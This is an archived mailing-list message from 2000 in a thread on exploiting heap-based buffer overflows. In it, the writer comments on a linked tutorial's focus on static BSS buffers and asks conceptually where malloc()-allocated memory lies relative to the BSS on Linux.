chrisferret.lmh.ox.ac.uk

• Next message: Matthew Kirkwood: "Re: Exploiting overflow of heap-based buffers"
• Previous message: Solar Designer: "Re: Exploiting overflow of heap-based buffers"
• In reply to: Dave Wreski: "Re: Exploiting overflow of heap-based buffers"
• Next in thread: Crispin Cowan: "Re: Exploiting overflow of heap-based buffers"
• Next in thread: Steve Beattie: "Re: Exploiting overflow of heap-based buffers"
• Reply: Chris Evans: "Re: Exploiting overflow of heap-based buffers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

On Tue, 23 May 2000, Dave Wreski wrote:

> There's a lengthy article on heap overflows available at:
>
> http://www.w00w00.org/files/articles/heaptut.txt

Thanks for the pointer. I've re-read the article. It sounded familiar, I
think I read it when it first came out.

Unfortunately, it has a heavy bias towards overflow of static buffers
(from the program's BSS segment).

I'm more interested in overflow of buffers created with
malloc(). Obviously, overflowing such buffers is a much less precise art -
their location in memory will vary widely depending upon system and also
differing code paths through the application. Also, what is _after_ the
overflowed buffer will vary.

Quite a lot of "interesting" things to overwrite will be in the BSS. Won't
pointers returned by malloc() (un)fortunately be after the BSS in virtual
memory on Linux?

Cheers
Chris

• Next message: Matthew Kirkwood: "Re: Exploiting overflow of heap-based buffers"
• Previous message: Solar Designer: "Re: Exploiting overflow of heap-based buffers"
• In reply to: Dave Wreski: "Re: Exploiting overflow of heap-based buffers"
• Next in thread: Crispin Cowan: "Re: Exploiting overflow of heap-based buffers"
• Next in thread: Steve Beattie: "Re: Exploiting overflow of heap-based buffers"
• Reply: Chris Evans: "Re: Exploiting overflow of heap-based buffers"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]